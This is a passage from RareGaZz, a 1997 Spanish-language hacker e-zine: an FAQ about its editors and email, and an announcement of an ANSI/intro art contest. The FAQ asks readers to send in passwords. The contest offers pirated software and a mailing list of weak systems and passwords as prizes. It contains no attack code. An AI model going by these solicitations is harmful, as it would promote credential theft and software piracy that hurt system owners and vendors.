y se la pasare a la persona en la que tenga mayor confianza en esos momentos
pero por ahora seguire como hasta ahora y claro tratando de mejorar.

¨Quien es RareTrip, KillerBot, LePompeItor y Mr. X?

Son el todo reunido en la nada con un proposito similar pero no igual :-) Lo
siento pero no puedo decir esas cosas, tal vez luego me den permiso de
mencionar las direcciones email con las que mantengo contacto con ellos.

¨Cada cuanto tiempo aparece RareGaZz?

Cuando esta terminado y punto. Si quieres ser avisado puedes unirte a la
lista de correo para tu comodidad pero para la nuestra, deja de enviar
correo preguntando por el proximo numero.


¨Que pasa cuando envio e-mail a RareGaZz?

Cuando envias un mensaje a las direcciones de RareGaZz terminara en una
direccion de Hotmail por lo que unicamente los que conocemos la clave
podemos leerlo. La clave es conocida en este momento unicamente por Mr.X
KillerBot, LepompeItor y RareTrip.
Gracias a las caracteristicas de Hotmail nosotros podemos saber cuando
revisamos correo si alguno ya ha sido leido y por un acuerdo de nosotros,
cuando se revise correo debera ser contestado para evitar que se pierdan
sus mensajes. Ademas no son borrados de Hotmail a menos que los mensajes
carezcan de importancia o el mensaje asi lo pida.


¨Como se generan los scripts para Debug como en el primer numero?

Bueno, para hacer esto me hice de una copia del archivo DBGSCRPT.COM escrito
por NowhereMan y viene incluido en las Nowhere Utilities (NUTILS20.ZIP)
disponible en la mayoria de las paginas de Hackers y ahora tambien en la de
RareGaZz. El Link para llegar a estas utilidades es:
http://www.geocities.com/Baja/4426/NUTILS20.ZIP
O visita la seccion de WareZ y alli estara el Link para bajar el archivo.

¨Que puedo hacer para ayudar a la revista?

Envianos textos, comentarios, links a paginas interesantes, passwds, noticias
sobre el Underground de tu localidad, etc.
Cualquiera puede ayudar y le estaremos muy agradecidos. Sin mencionar que
sera a¤adido a la lista de cool people que conocemos...

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-

-= Primer Concurso de RareGaZz =-

Este concurso consiste en crear un INTRO o archivo ASCII/ANSI para promover
nuestra revista en diferentes paquetes de software. Para el ganador o
ganadores habra paquetes de software con gran valor y ademas una camiseta
con graficas a colores cortesia de RareGaZz.
Ninguno de los encargados de la revista puede participar asi como los
miembros de RdK por ser amigos del encargado del concurso.

Requisitos:

-El trabajo no debera ser mayor de 18 centimetros de alto y 10 de ancho
(18x10) -En el caso de trabajos ASCII/ANSI-
-En el caso de un programa INTRO podra incluir sonido y todas las cosas que
quieras siempre y cuando no pase de los 70k.
-Si es un INTRO incluye las especificaciones minimas de un sistema para poder
ejecutar el programa.
-Si programas un INTRO deberas incluir tambien el codigo fuente con
instrucciones precisas para compilarlo.
-Los intros podran estar programados en cualquier lenguaje y no deben ser de
mas de un archivo.
-El archivo o programa debera crear la palabra RareGaZz de la manera mas
llamativa posible, incluyendo colores (ansi) o sin ellos (ascii).
-El archivo *NO* debera incluir el nombre del programador a menos que este
se encuentre en el codigo interno del programa.
-Deberas entregar el trabajo en archivo ZIP con tu direccion de e-mail
unicamente como informacion personal.
-No hagas el trabajo bajo ningun pseudonimo ya que en caso de resultar
ganador necesitariamos tu direccion para enviarte los premios.

Premios:

-Una camiseta blanca con la palabra RareGaZz en tama¤o grande por la parte de
atras y en la parte superior izquierda con letras peque¤as la leyenda "UNIX
LOVER" debajo de la grafica de nuestro WebSite.
-Un paquete de Diskettes conteniendo WareZ como PcCillin95, McAffee95,
Autocad Pro (*), PGPFONE, PGP, Software de comunicaciones Bitware, Netscape
GOLD con Plugins CoolTalk, Live3d, Java, RealAudio y RealMovie. Quicktime
para Windows, C++, Pascal, Turbo Assembler (*), entre otros.
-La inclusion automatica a la lista de correo RareDudeZ que informa sobre
sistemas debiles en la republica y passwords existentes!
(*) Estos programas pueden o no estar incluidos.

Cada persona puede participar con 3 creaciones que pueden ser las que el
eliga, por ejemplo 1 ascii-1 ansi y 1 intro o 3 intros, o 2 ansi y un intro,
etc. Envia tus participaciones ­AHORA!

La fecha limite para enviarlas es primero de septiembre de 1997. El ganador
se dara a conocer 15 dias despues.

Para enviar trabajos comprimelos a un zip y codificalos con UUENCODE que
viene incluido en el primer numero de la revista con el siguiente comando:
UUENCODE ARCHIVO.ZIP
Si el comando crea mas de un archivo .UUE elabora un mensaje para cada uno y
escribe en el subject claramente que numero de archivo es cada mensaje.

Todos los programas o archivos participantes estaran a disposicion del mundo
entero en nuestra Home Page a menos que el creador especifique lo contrario.

Si tienes dudas escribe preguntando pero no dejes de participar, los premios
y el reconocimiento que recibiras valen la pena el esfuerzo.

RareGaZz
~~~~~~~~

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-


Editor: RareTrip
Colaboradores: KillerBot, Mr.X, Raven Spirit,
DuvaHazard, Dark Raver, RdK.
Color: YourEyesAreCrazy (c) incorporated
Entusiasmo: http://www.AlotOfSeX.com.mx
Proveedor: Cartel de Cali, entre otros.
Cool People: ThunderStorm, CyberCrash, Azteca y Manuel Luna(cicese)
por sus excelentes ideas y groovy filosofia.
Nice Girl: Dulce.
Exiliado: Extreme *ahora Thunder Lord y en tlord@usa.net*
Comentario: Gracias a Expedition quien me ayudo
un chingo despues de mi peque¤o
incidente con la ley >:-}

<<::RareGaZz::>>
"They got the guns but...we got the numbers"

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT